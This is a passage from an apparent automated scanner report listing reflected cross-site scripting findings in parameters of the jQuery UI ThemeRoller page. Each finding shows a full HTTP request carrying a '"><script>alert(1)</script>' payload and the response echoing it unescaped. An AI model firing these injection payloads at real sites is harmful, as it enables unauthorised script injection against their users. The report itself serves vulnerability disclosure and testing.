GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6549013"><script>alert(1)</script>e719f071a57&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6549013"><script>alert(1)</script>e719f071a57&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

3.23. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2b8e"><script>alert(1)</script>4893dfa1069 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75f2b8e"><script>alert(1)</script>4893dfa1069&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75f2b8e"><script>alert(1)</script>4893dfa1069&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

3.24. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f27d"><script>alert(1)</script>ef2045cfdcc was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753f27d"><script>alert(1)</script>ef2045cfdcc&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753f27d"><script>alert(1)</script>ef2045cfdcc&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

3.25. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10d83"><script>alert(1)</script>440d9262b96 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9510d83"><script>alert(1)</script>440d9262b96&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9510d83"><script>alert(1)</script>440d9262b96&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

3.26. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bb4"><script>alert(1)</script>9e07f5d558 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75e5bb4"><script>alert(1)</script>9e07f5d558&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75e5bb4"><script>alert(1)</script>9e07f5d558&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

3.27. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ffee"><script>alert(1)</script>0861f63f7bc was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556ffee"><script>alert(1)</script>0861f63f7bc&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556ffee"><script>alert(1)</script>0861f63f7bc&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

3.28. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59604"><script>alert(1)</script>34ad975ff8c was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7559604"><script>alert(1)</script>34ad975ff8c&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7559604"><script>alert(1)</script>34ad975ff8c&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

3.29. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf027"><script>alert(1)</script>1e9050619f4 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0cf027"><script>alert(1)</script>1e9050619f4&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0cf027"><script>alert(1)</script>1e9050619f4&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

3.30. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 994f3"><script>alert(1)</script>03809dbf2df was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0994f3"><script>alert(1)</script>03809dbf2df&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0994f3"><script>alert(1)</script>03809dbf2df&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.31. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 882e1"><script>alert(1)</script>07149fc06f1 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET 